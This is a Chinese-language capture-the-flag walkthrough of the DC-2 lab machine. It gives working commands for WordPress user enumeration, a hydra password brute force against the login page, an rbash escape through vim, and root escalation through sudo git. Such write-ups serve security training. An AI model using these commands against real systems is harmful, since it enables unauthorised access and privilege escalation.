DC-2

DC-2

目录

• DC-2
• 信息收集
• web打点
  • 生成字典
  • 爆破
  • null
  • 文件上传
• ssh连接
  • rbash逃逸
• git提权
• 总结

---

发现靶机iparp-scan -l

访问发现找不到host，这里先添加host

web端成功访问，开始渗透之路

信息收集

开了一个80。7744端口，wordpress组件 ，ssh改到7744端口上了，那就直接考虑对wordpress进行渗透吧

web打点

生成字典

访问/flag，发现需要爆破，同时使用cewl

cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到工具里进行密码破解。

所以我们先使用cewl爬取网页上的词

cewl http://dc-2/ -w dict.txt

再使用wpscan进行扫描

wpscan --url http://dc-2 --enumerate u

直接就找到了三个用户名，将三个用户名写入txt中，用hydra爆破

爆破

wordpress的默认后台在

http://dc-2/wp-login.php

由于kali linux里面的burp是社区版，爆破太慢了，直接用hydra爆了

hydra -L /root/桌面/username.txt -P /root/桌面/dict.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

爆出来两个账户名密码，登陆

发现flag2

文件上传

发现有个文件上传点，尝试一波

MIME类型检测，改一改

直接没给写权限，尴尬了，换思路了

ssh连接

找不到什么可以利用的点，试试用刚刚的账户密码，登陆ssh试试

用tom的账号登陆成功了，但是是rbash，很多命令不能用。

看看能用哪些命令

ls发现flag3就在当前目录下，直接vim

看意思是要rbash逃逸

rbash逃逸

关于rbash文章

检查一遍，/不能用，不能连接ssh的时候逃逸了，尝试用vim

i进入编辑模式后，输入

:set shell=/bin/bash

再输入

:shell

找到第四个flag

看着提示需要git提权，找下怎么提权的

git提权

此时发现tom用户无git命令，切换到jerry用户下

先添加环境变量

echo $PATH         
export PATH=$PATH:/bin:/usr/bin

成功切换到jerry下

sudo git help config

!/bin/sh

提权成功

最后的flag在root目录下

总结

• rbash逃逸
• git提权
• cewl爬取